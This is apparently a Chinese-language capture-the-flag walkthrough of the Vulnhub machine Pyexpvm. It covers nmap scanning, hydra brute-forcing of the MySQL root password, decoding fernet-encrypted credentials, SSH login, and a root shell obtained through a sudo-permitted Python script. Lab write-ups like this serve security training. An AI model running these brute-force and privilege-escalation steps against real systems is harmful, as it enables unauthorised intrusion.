打靶记录(三六)之VulnhubPyexpvm

主机发现

sudo nmap -sn 192.168.162.0/24

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.162.144 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 21:04 CST
Nmap scan report for 192.168.162.144
Host is up (0.00079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
1337/tcp open  waste
3306/tcp open  mysql
MAC Address: 00:0C:29:7C:45:00 (VMware)

sudo nmap -sT -sV -sC -O -p1337,3306 192.168.162.144   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 21:04 CST
Nmap scan report for 192.168.162.144
Host is up (0.00043s latency).

PORT     STATE SERVICE VERSION
1337/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 f7:af:6c:d1:26:94:dc:e5:1a:22:1a:64:4e:1c:34:a9 (RSA)
|   256 46:d2:8d:bd:2f:9e:af:ce:e2:45:5c:a6:12:c0:d9:19 (ECDSA)
|_  256 8d:11:ed:ff:7d:c5:a7:24:99:22:7f:ce:29:88:b2:4a (ED25519)
3306/tcp open  mysql   MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.23-MariaDB-0+deb10u1
|   Thread ID: 39
|   Capabilities flags: 63486
|   Some Capabilities: SupportsLoadDataLocal, Speaks41ProtocolOld, IgnoreSigpipes, SupportsTransactions, Support41Auth, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, ODBCClient, FoundRows, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsCompression, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: -Jmd0avQo[[9G;1!S_e[
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:7C:45:00 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Getshell

只开了两个端口啊，一个ssh一个mysql。

searchsploit mysql 5.5

试着找找看mysql的漏洞，但是存在的貌似都是提权漏洞，我们还没拿到权限

比起ssh，我更倾向于爆破mysql

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.162.144 -t 4 mysql

得到密码prettywoman

mysql -h 192.168.162.144 -uroot -p

远程连接数据库

show databases；

use data

发现有四个数据库，我们对“data”这个数据库比较感兴趣

show tables；

有一个叫做fernet的表

select * from fernet;

有cred和keyy两个列，而且里面的数据貌似不能解密。搜索了一下fernet，貌似是一个对称加密方式，而且正好需要cred和key

直接跑网站 https://asecuritysite.com/tokens/ferdecode

解得：lucy:wJ9`”Lemdv9[FEw-

ssh -p 1337 lucy@192.168.162.144

成功连接

提权

sudo -l发现能执行一个python脚本，查看一下这个脚本的内容，是可以执行输入的命令。这就简单了

sudo /usr/bin/python2 /opt/exp.py

然后输入

import os;os.system('/bin/bash')

提权成功

碎碎念

还是挺简单的靶机，唯一的了解就是fernet对称加密吧